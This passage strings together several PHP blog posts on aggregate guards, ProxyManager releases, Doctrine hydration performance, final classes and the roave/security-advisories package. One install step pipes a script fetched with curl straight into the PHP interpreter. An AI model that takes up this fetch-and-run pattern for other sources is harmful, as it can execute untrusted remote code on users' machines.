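        $this->totalAmount = $totalAmount;
    }

    public function checkOut(int $chargeAmount, PaymentGateway $gateway) : void
    {
        // the guards live in the aggregate, not in the command handler:
        if (null !== $this->charge) {
            throw new DomainException('Already purchased');
        }

        if ($this->totalAmount <= 0) {
            throw new DomainException('Cannot check out an empty shopping cart');
        }

        if ($chargeAmount !== $this->totalAmount) {
            throw new DomainException('Price mismatch');
        }

        $this->charge = $gateway->captureCharge($chargeAmount);
    }
}

$gateway = new FakePaymentGateway();
$cart    = new ShoppingCart(100);

$cart->checkOut(100, $gateway); // happy path: one charge captured

try {
    $cart->checkOut(100, $gateway); // second checkout is rejected
} catch (DomainException $exception) {
    echo $exception->getMessage(), "\n"; // "Already purchased"
}
```

Note how the unhappy paths from the scenarios are now enforced by the aggregate itself, so they can be exercised without any command handler involved.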
Besides getting rid of the command handler in the scenario tests, here is a list of advantages of what we just implemented:
The approach described here fits any kind of application where there is a concept of Entity or Aggregate. Feel free to stuff your entity API with business logic!
Just remember that entities should only be self-aware, and only context-aware in the context of certain business interactions: don't inject or statically access domain services from within an entity.
]]>
ProxyManager 2.0.0 was finally released today!
It took a bit more than a year to get here, but major improvements were included in this release, along with exclusive PHP 7 support.
Most of the features that we planned to provide were indeed implemented into this release.
As a negative note, HHVM compatibility was not achieved, as HHVM is not yet compatible with PHP 7.0.x-compliant code.
As of this release, ProxyManager 1.0.x switches to security-only support.
ProxyManager 2.x will be a maintenance-only release:
No features are going to be added to ProxyManager 2.x: the current master branch will instead
become the development branch for version 3.0.0.
Features for ProxyManager 3.0.0 are yet to be planned, but we reached exceptional code quality, complete test coverage and nice performance improvements with 2.0.0: the future is bright!
And of course, a big "thank you" to all those who contributed to this release!
]]>Doctrine ORM, like most ORMs, is performing a process called Hydration when converting database results into objects.
This process usually involves reading a record from a database result and then converting the column values into an object's properties.
Here is a little pseudo-code snippet that shows what a mapper is actually doing under the hood:
<?php
$results = [];
$reflectionFields = $mappingInformation->reflectionFields();
while ($row = $resultSet->fetchRow()) {
$object = new $mappedClassName;
foreach ($reflectionFields as $column => $reflectionField) {
$reflectionField->setValue($object, $row[$column]);
}
$results[] = $object;
}
return $results;
That's a very basic example, but this gives you an idea of what an ORM is doing for you.
As you can see, this is an O(N) operation (assuming a constant number of reflection fields).
There are multiple ways to speed up this particular process, but we can only remove constant overhead from it, and not actually reduce it to something more efficient.
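As an example of shaving off such constant overhead (a sketch of a well-known technique, not Doctrine's actual implementation), the per-field reflection calls can be replaced by a single closure bound into the mapped class's scope, which may then write private properties directly. The `Person` class and its fields are invented for illustration:

```php
<?php

// Sketch: replace per-field reflection with one closure re-scoped into the
// mapped class, so private properties can be assigned directly.

final class Person
{
    private $name;
    private $age;

    public function name() : string { return $this->name; }
    public function age() : int { return $this->age; }
}

// built once per mapped class, then reused for every row:
$hydrate = Closure::bind(
    static function (Person $object, array $row) : void {
        $object->name = $row['name']; // legal: we are in Person's scope
        $object->age  = $row['age'];
    },
    null,
    Person::class
);

$resultSet = [
    ['name' => 'Marco', 'age' => 30],
    ['name' => 'Jane',  'age' => 40],
];

$results = [];

foreach ($resultSet as $row) {
    $object = new Person();

    $hydrate($object, $row);

    $results[] = $object;
}

echo $results[0]->name(); // Marco
```

The closure is built once and reused for every row, so the reflection-like cost is paid per class instead of per field per row; the overall complexity is still O(N).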
Hydration starts to become expensive with complex resultsets.
Consider the following SQL query:
SELECT
u.id AS userId,
u.username AS userUsername,
s.id AS socialAccountId,
s.username AS socialAccountUsername,
s.type AS socialAccountType
FROM
user u
LEFT JOIN
socialAccount s
ON s.userId = u.id
Assuming that the relation from user to socialAccount is a one-to-many,
this query retrieves all the social accounts for all the users in our application.
A resultset may be as follows:
| userId | userUsername | socialAccountId | socialAccountUsername | socialAccountType |
|---|---|---|---|---|
| 1 | [email protected] | 20 | ocramius | |
| 1 | [email protected] | 21 | @ocramius | |
| 1 | [email protected] | 22 | ocramiusaethril | Last.fm |
| 2 | [email protected] | NULL | NULL | NULL |
| 3 | [email protected] | 85 | awesomegrandma9917 | |
As you can see, we are now joining 2 tables in the results, and the ORM has to perform more complicated operations:
1. Create a User object for [email protected]
2. Hydrate the three SocialAccount instances into User#$socialAccounts for [email protected], while skipping re-hydrating the User [email protected]
3. Create a User object for [email protected]
4. Leave User#$socialAccounts empty for [email protected], as no social accounts are associated
5. Create a User object for [email protected]
6. Hydrate a SocialAccount instance into User#$socialAccounts for [email protected]
This operation is what is done by Doctrine ORM when you use the DQL Fetch Joins feature.
Fetch joins are a very efficient way to hydrate multiple records without resorting to multiple queries, but there are performance issues with this approach (not covered by this article). In particular, since the same record may appear in multiple rows of the resultset (for instance with many-to-many associations), we want to de-duplicate records by keeping a temporary in-memory identifier map.
Additionally, our operation starts to become more complicated, as it is now O(n * m), with n and m being the number of records in the user and socialAccount tables.
What the ORM is actually doing here is normalizing data that was fetched in a de-normalized resultset, and that is going through your CPU and your memory.
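A minimal plain-PHP sketch of that normalization step (hydrating into arrays rather than entities, with invented sample data) shows the identity-map bookkeeping involved:

```php
<?php

// Sketch: normalizing a LEFT JOIN resultset. An identity map keyed by
// userId ensures each user is hydrated once, while each row may still
// contribute one joined socialAccount record.

$resultSet = [
    ['userId' => 1, 'userUsername' => 'alice', 'socialAccountId' => 20],
    ['userId' => 1, 'userUsername' => 'alice', 'socialAccountId' => 21],
    ['userId' => 2, 'userUsername' => 'bob',   'socialAccountId' => null],
];

$identityMap = [];

foreach ($resultSet as $row) {
    $userId = $row['userId'];

    // de-duplication: only hydrate each user on its first appearance
    if (! isset($identityMap[$userId])) {
        $identityMap[$userId] = [
            'username'       => $row['userUsername'],
            'socialAccounts' => [],
        ];
    }

    // a NULL on the right side of the LEFT JOIN means "no associated record"
    if (null !== $row['socialAccountId']) {
        $identityMap[$userId]['socialAccounts'][] = $row['socialAccountId'];
    }
}

var_dump(count($identityMap)); // int(2)
```

Every duplicated row still has to be fetched, transferred and inspected, even though most of it is thrown away: that is the hydration overhead being discussed.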
The process of hydration becomes extremely expensive when more than 2 LEFT JOIN
clauses are part of our queries:
SELECT
u.id AS userId,
u.username AS userUsername,
sa.id AS socialAccountId,
sa.username AS socialAccountUsername,
sa.type AS socialAccountType,
s.id AS sessionId,
s.expiresOn AS sessionExpiresOn
FROM
user u
LEFT JOIN
socialAccount sa
ON sa.userId = u.id
LEFT JOIN
session s
ON s.userId = u.id
This kind of query produces a much larger resultset, and the results are duplicated by a lot:
| userId | userUsername | socialAccountId | socialAccountUsername | socialAccountType | sessionId | sessionExpiresOn |
|---|---|---|---|---|---|---|
| 1 | [email protected] | 20 | ocramius | | ocramius-macbook | 2015-04-20 22:08:56 |
| 1 | [email protected] | 21 | @ocramius | | ocramius-macbook | 2015-04-20 22:08:56 |
| 1 | [email protected] | 22 | ocramiusaethril | Last.fm | ocramius-macbook | 2015-04-20 22:08:56 |
| 1 | [email protected] | 20 | ocramius | | ocramius-android | 2015-04-20 22:08:56 |
| 1 | [email protected] | 21 | @ocramius | | ocramius-android | 2015-04-20 22:08:56 |
| 1 | [email protected] | 22 | ocramiusaethril | Last.fm | ocramius-android | 2015-04-20 22:08:56 |
| 2 | [email protected] | NULL | NULL | NULL | NULL | NULL |
| 3 | [email protected] | 85 | awesomegrandma | | home-pc | 2015-04-15 10:05:31 |
If you try to re-normalize this resultset, you can actually see how many useless de-duplication operations have to happen.
That is because the User [email protected] has multiple active sessions on
multiple devices, as well as multiple social accounts.
SLOW!
The hydration operations on this resultset are O(n * m * q), which I'm going to simply
generalize as O(n ^ m), with n being the amount of results, and m
being the amount of joined tables.
Here is a graphical representation of O(n ^ m):
Yes, it is bad.
How do we avoid O(n ^ m) hydration?
O(n ^ m) can be avoided with some very simple, yet effective approaches.
No, it's not "don't use an ORM", you muppet.
Avoiding one-to-many and many-to-many associations
Collection-valued associations are as useful as they are problematic, as you never know how much data you are going to load.
Unless you use fetch="EXTRA_LAZY" and Doctrine\Common\Collections\Collection#slice()
wisely, you will probably make your app crash if you initialize a very large collection of associated objects.
Therefore, the simplest yet most limiting advice is to avoid collection-valued associations whenever they are not strictly necessary.
Additionally, reduce the amount of bi-directional associations to the strict minimum.
After all, code that is not required should not be written in the first place.
The second approach is simpler, and allows us to exploit how the ORM's UnitOfWork is working
internally.
In fact, we can simply split hydration for different associations into different queries, or multiple steps:
SELECT
u.id AS userId,
u.username AS userUsername,
s.id AS socialAccountId,
s.username AS socialAccountUsername,
s.type AS socialAccountType
FROM
user u
LEFT JOIN
socialAccount s
ON s.userId = u.id
We already know this query: hydration for it is O(n * m), but that's the best we can do,
regardless of how we code it.
SELECT
u.id AS userId,
u.username AS userUsername,
s.id AS sessionId,
s.expiresOn AS sessionExpiresOn
FROM
user u
LEFT JOIN
session s
ON s.userId = u.id
This query is another O(n * m) hydration one, but we are now only loading the user sessions
in the resultsets, avoiding duplicate results overall.
By re-fetching the same users, we are telling the ORM to re-hydrate those objects (which are now in memory,
stored in the UnitOfWork): that fills the User#$sessions collections.
Also, please note that we could have used a JOIN instead of a LEFT JOIN, but that
would have triggered lazy-loading of the sessions for the [email protected] User later on.
Additionally, we could also have skipped the userUsername field in the results, as it is already in memory and well known.
SOLUTION:
We now reduced the hydration complexity from O(n ^ m) to O(n * m * k), with
n being the amount of User instances, m being the amount of associated
to-many results, and k being the amount of associations that we want to hydrate.
Let's get more specific and code the various queries represented above in DQL.
Here is the O(n ^ m) query (in this case, O(n ^ 3)):
return $entityManager
->createQuery('
SELECT
user, socialAccounts, sessions
FROM
User user
LEFT JOIN
user.socialAccounts socialAccounts
LEFT JOIN
user.sessions sessions
')
->getResult();
This is how you'd code the multi-step hydration approach:
$users = $entityManager
->createQuery('
SELECT
user, socialAccounts
FROM
User user
LEFT JOIN
user.socialAccounts socialAccounts
')
->getResult();
$entityManager
->createQuery('
SELECT PARTIAL
user.{id}, sessions
FROM
User user
LEFT JOIN
user.sessions sessions
')
->getResult(); // result is discarded (this is just re-hydrating the collections)
return $users;
I'd also add that this is the only legitimate use-case for partial hydration that I ever had, but it's a personal opinion/feeling.
As you may have noticed, all this overhead is caused by normalizing de-normalized data coming from the DB.
Other solutions that we may work on in the future include:
Just so you stop thinking that I pulled out all these thought out of thin air, here is a repository with actual code examples that you can run, measure, compare and patch yourself:
Give it a spin and see the results for yourself!
]]>TL;DR: make your classes always final, if they implement an interface,
and no other public methods are defined.
In the last month, I had a few discussions about the usage of the final marker on PHP classes.
The pattern is recurrent: I suggest marking a class as final, and somebody objects that final limits flexibility.
It is therefore clear that coders need a better explanation of when to use final,
and when to avoid it.
There are many other articles about the subject, but this is mainly thought as a "quick reference" for those that will ask me the same questions in future.
final should be used whenever possible.
Why final?
There are numerous reasons to mark a class as final: I will list and describe those that are
most relevant in my opinion.
Developers have the bad habit of fixing problems by providing specific subclasses of an existing (inadequate) solution. You probably saw it yourself with examples like the following:
<?php
class Db { /* ... */ }
class Core extends Db { /* ... */ }
class User extends Core { /* ... */ }
class Admin extends User { /* ... */ }
class Bot extends Admin { /* ... */ }
class BotThatDoesSpecialThings extends Bot { /* ... */ }
class PatchedBot extends BotThatDoesSpecialThings { /* ... */ }
This is, without any doubt, how you should NOT design your code.
The approach described above is usually adopted by developers who confuse OOP with "a way of solving problems via inheritance" ("inheritance-oriented-programming", maybe?).
In general, preventing inheritance in a forceful way (by default) has the nice advantage of making developers think more about composition.
There will be less stuffing functionality in existing code via inheritance, which, in my opinion, is a symptom of haste combined with feature creep.
Take the following naive example:
<?php
class RegistrationService implements RegistrationServiceInterface
{
public function registerUser(/* ... */) { /* ... */ }
}
class EmailingRegistrationService extends RegistrationService
{
public function registerUser(/* ... */)
{
$user = parent::registerUser(/* ... */);
$this->sendTheRegistrationMail($user);
return $user;
}
// ...
}
By making the RegistrationService final, the idea behind
EmailingRegistrationService being a child-class of it is denied upfront, and silly mistakes such
as the previously shown one are easily avoided:
<?php
final class EmailingRegistrationService implements RegistrationServiceInterface
{
public function __construct(RegistrationServiceInterface $mainRegistrationService)
{
$this->mainRegistrationService = $mainRegistrationService;
}
public function registerUser(/* ... */)
{
$user = $this->mainRegistrationService->registerUser(/* ... */);
$this->sendTheRegistrationMail($user);
return $user;
}
// ...
}
Developers tend to use inheritance to add accessors and additional API to existing classes:
<?php
class RegistrationService implements RegistrationServiceInterface
{
protected $db;
public function __construct(DbConnectionInterface $db)
{
$this->db = $db;
}
public function registerUser(/* ... */)
{
// ...
$this->db->insert($userData);
// ...
}
}
class SwitchableDbRegistrationService extends RegistrationService
{
public function setDb(DbConnectionInterface $db)
{
$this->db = $db;
}
}
This example shows a set of flaws in the thought-process that led to the
SwitchableDbRegistrationService:
- the setDb method is used to change the DbConnectionInterface at runtime, which seems to hide a different problem being solved: maybe we need a MasterSlaveConnection instead?
- the setDb method is not covered by the RegistrationServiceInterface, therefore we can only use it when we strictly couple our code with the SwitchableDbRegistrationService, which defeats the purpose of the contract itself in some contexts.
- the setDb method changes dependencies at runtime, and that may not be supported by the RegistrationService logic, and may as well lead to bugs.
- the setDb method was introduced because of a bug in the original implementation: why was the fix provided this way? Is it an actual fix or does it only fix a symptom?
There are more issues with the setDb example, but these are the most relevant ones for our purpose
of explaining why final would have prevented this sort of situation upfront.
Since classes with a lot of public methods are very likely to break the SRP, it is often true that a developer will want to override specific API of those classes.
Starting to make every new implementation final forces the developer to think about new APIs upfront,
and about keeping them as small as possible.
A final class can always be made extensible
Coding a new class as final also means that you can make it extensible at any point in time (if really
required).
No drawbacks, but you will have to explain your reasoning for such change to yourself and other members in your team, and that discussion may lead to better solutions before anything gets merged.
extends breaks encapsulation
Unless the author of a class specifically designed it for extension, then you should consider it final
even if it isn't.
Extending a class breaks encapsulation, and can lead to unforeseen consequences and/or
BC breaks: think twice before using the extends keyword,
or better, make your classes final and spare others from having to think about it.
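As a contrived illustration of the problem (all names invented), a subclass can break an invariant that consumers of the parent class rely upon, without violating any visible contract:

```php
<?php

// Illustration: `protected` state is not part of any contract, so a
// subclass can silently break an invariant established by the parent.

class Counter
{
    protected $count = 0;

    public function increment() : int
    {
        return ++$this->count;
    }
}

class ResettingCounter extends Counter
{
    public function increment() : int
    {
        // a "small tweak" that breaks the parent's "values only grow" invariant:
        if ($this->count >= 2) {
            $this->count = 0;
        }

        return parent::increment();
    }
}

// code written against Counter assumes strictly increasing values:
function takeThreeReadings(Counter $counter) : array
{
    return [$counter->increment(), $counter->increment(), $counter->increment()];
}

var_dump(takeThreeReadings(new Counter()));          // [1, 2, 3]
var_dump(takeThreeReadings(new ResettingCounter())); // [1, 2, 1]
```

Marking Counter as final would have forced the author of ResettingCounter towards composition, keeping the invariant intact.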
One argument that I always have to counter is that final reduces flexibility of use of a codebase.
My counter-argument is very simple: you don't need that flexibility.
Why do you need it in the first place? Why can't you write your own customized implementation of a contract? Why can't you use composition? Did you carefully think about the problem?
If you still need to remove the final keyword from an implementation, then there may be some other
sort of code-smell involved.
Once you made a class final, you can change it as much as it pleases you.
Since encapsulation is guaranteed to be maintained, the only thing that you have to care about is the public API.
Now you are free to rewrite everything, as many times as you want.
When to avoid final
Final classes only work effectively under the following assumptions:
- there is an abstraction (interface) that the final class implements
- all of the public API of the final class is also part of that interface
If one of these two pre-conditions is missing, then you will likely reach a point in time when you will make the class extensible, as your code is not truly relying on abstractions.
An exception can be made if a particular class represents a set of constraints or concepts that are totally
immutable, inflexible and global to an entire system.
A good example is a mathematical operation: $calculator->sum($a, $b) is unlikely to change over time.
In these cases, it is safe to assume that we can use the final keyword without an abstraction to
rely on first.
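A minimal sketch of such a case (the class name is illustrative):

```php
<?php

// A concept that is immutable and global to the entire system can safely be
// `final` without any backing interface:

final class Calculator
{
    public function sum(int $a, int $b) : int
    {
        return $a + $b;
    }
}

$calculator = new Calculator();

echo $calculator->sum(2, 3); // 5
```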
Another case where you do not want to use the final keyword is on existing classes: that can only
be done if you follow semver and you bump the major version
for the affected codebase.
After having read this article, consider going back to your code, and if you never did so,
adding your first final marker to a class that you are planning to implement.
You will see the rest just getting in place as expected.
]]>
Today I finally released version 1.0.0 of ProxyManager!
ProxyManager 1.x will be a maintenance-release only:
No features are going to be added to ProxyManager 1.x: the current master branch will instead
become the development branch for version 2.0.0.
ProxyManager 2.0.0 has the following main aims:
- Doctrine\Common\Proxy\AbstractProxyFactory, to improve Doctrine proxy logic in next generation data mappers
It wouldn't be a good 1.0.0 release without thanking all the contributors that helped with the project, by providing patches, bug reports and their useful insights to the project. Here are the most notable ones:
]]>Since it's almost Christmas, it's also time to release a new project!
The Roave Team is pleased to announce the release of roave/security-advisories, a package that keeps known security issues out of your project.
Before telling you more, go grab it:
mkdir roave-security-advisories-test
cd roave-security-advisories-test
curl -sS https://getcomposer.org/installer | php --
./composer.phar require roave/security-advisories:dev-master
Hold on: I will tell you what to do with it in a few.
roave/security-advisories is a composer package that prevents installation of packages with known security issues.
Last year, Fabien Potencier announced the security.sensiolabs.org project. This October, he announced that the project was being moved to the open-source FriendsOfPHP organization.
While I like the idea of integrating security checks with my
CI, I don't like the fact that it is possible to install
and run harmful software before those checks.
I also don't want to install and run an additional CLI tool for something that composer can provide directly.
That's why I had the idea of compiling a list of conflicting versions from the security advisories database into a composer metapackage:
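In essence, the metapackage is little more than a composer.json with a large conflict section. The excerpt below is only a sketch of the idea: the version ranges are invented for illustration, while the real entries are generated from the advisories database.

```json
{
    "name": "roave/security-advisories",
    "type": "metapackage",
    "description": "Prevents installation of composer packages with known security vulnerabilities",
    "conflict": {
        "symfony/symfony": ">=2.5.0,<2.5.12",
        "zendframework/zendframework": ">=2.3.0,<2.3.3"
    }
}
```

Since a metapackage ships no files, requiring it costs nothing at runtime: it only constrains what the dependency resolver is allowed to install.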
This has various advantages:
Now that you installed roave/security-advisories, you can try out how it works:
cd roave-security-advisories-test
./composer.phar require symfony/symfony:2.5.2 # this will fail
./composer.phar require zendframework/zendframework:2.3.1 # this will fail
./composer.phar require symfony/symfony:~2.6 # works!
./composer.phar require zendframework/zendframework:~2.3 # works!
Simple enough!
Please just note that this only works when adding new dependencies or when running composer update:
security issues in your composer.lock cannot be checked with this technique.
Because of how composer dependency resolution works, it is not possible to use
roave/security-advisories at any version other than dev-master. More about this can be found on the
project page.